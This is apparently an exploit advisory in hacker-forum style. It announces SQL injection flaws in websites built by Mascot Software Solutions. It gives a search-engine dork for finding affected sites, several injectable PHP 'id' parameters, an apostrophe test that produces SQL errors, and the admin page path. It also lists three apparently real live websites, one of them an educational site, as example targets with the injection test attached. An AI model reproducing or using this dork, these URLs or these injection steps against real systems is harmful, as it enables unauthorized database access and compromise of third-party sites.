‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Exploit Title : Mascot Software Solutions.. SQL injection Vulnerability
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Design & Maintained By : Mascot Software Solutions"[Or]"Creation By : Mascot Software Solutions"
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Exploit:
››http://localhost/deatilsnews.php?id={VaLid id }
››http://localhost/viewgallery.php?id={VaLid id }
››http://localhost/noticeDetails.php?id={VaLid id }
››Check all .php?*= mostly all vul.. to sql-i.!
›› use your head..!!
››http://localhost/deatilsnews.php?id=' » {sql Error} (^_^)
››http://localhost/deatilsnews.php?id= SQL here
...
›› admin page:
›› http://localhost/admin/ (*_*)
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+] Example:
››http://www.kvsiwan.org/deatilsnews.php?id=36'
››http://www.dalimss.com/viewgallery.php?id=52'
››http://siitgkp.edu.in/viewgallery.php?id=2'
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡
[+]Greetz To : 4ll 1nj3ctor team... 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued..